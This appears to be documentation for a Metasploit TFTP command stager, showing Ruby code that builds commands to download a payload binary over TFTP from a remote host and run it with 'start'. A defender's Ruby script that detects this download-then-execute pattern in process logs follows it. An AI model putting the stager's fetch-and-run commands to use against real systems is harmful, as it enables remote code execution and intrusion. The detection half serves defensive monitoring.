CmdStagerBase
This class provides the ability to create a sequence of commands from an executable. When this sequence is run via command injection or a shell, the resulting exe will be written to disk and executed.
This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.
Requires: tftp.exe, outbound UDP connectivity to a TFTP server
Written by Joshua J. Drake
We override compress_commands just to append a few extra commands at the last second.
# File lib/rex/exploitation/cmdstager/tftp.rb, line 41
def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"

  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end

  super
end
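For defenders, the two commands appended above leave a recognisable pair in process-creation telemetry: a binary-mode `tftp -i ... GET` to a local path, followed by a `start` of that same path. The following Ruby sketch is an added example, not part of Rex or Metasploit; the names `find_tftp_stager` and `window` and the sample command lines are assumptions constructed for illustration.

```ruby
# Added detection sketch (not Metasploit code). Input: process command lines
# in execution order, e.g. extracted from process-creation logs.

# Matches: tftp[.exe] -i <host> GET <remote> <local>  (-i = binary transfer mode)
TFTP_GET  = /\btftp(?:\.exe)?\s+-i\s+(?<host>\S+)\s+get\s+(?<remote>\S+)\s+(?<local>\S+)/i
# Matches: start <path>
START_CMD = /\bstart\s+(?<path>\S+)/i

# Normalise a Windows path for comparison (strip quotes, ignore case).
def norm_path(path)
  path.delete('"').downcase
end

# Returns one finding per binary-mode TFTP download. :executed is true when the
# downloaded file is launched with `start` within `window` following commands.
def find_tftp_stager(cmdlines, window: 5)
  findings = []
  cmdlines.each_with_index do |line, i|
    m = TFTP_GET.match(line)
    next unless m

    local = norm_path(m[:local])
    launched = cmdlines[(i + 1)..(i + window)].to_a.any? do |later|
      s = START_CMD.match(later)
      s && norm_path(s[:path]) == local
    end
    findings << { host: m[:host], remote: m[:remote],
                  local: m[:local], executed: launched }
  end
  findings
end

# Constructed sample command lines (not real telemetry).
SAMPLE = [
  'cmd.exe /c dir C:\\Users',
  'tftp -i 192.0.2.10 GET aBcD %TEMP%\\xyz.exe',
  'start %TEMP%\\xyz.exe',
  'tftp.exe -i 198.51.100.7 get config.txt C:\\backup\\config.txt',
  'cmd.exe /c start notepad.exe'
].freeze

if __FILE__ == $PROGRAM_NAME
  find_tftp_stager(SAMPLE).each { |f| puts f.inspect }
end
```

A download with `executed: true` is the higher-confidence signal; a TFTP download alone may be legitimate administration and is reported with `executed: false` for triage.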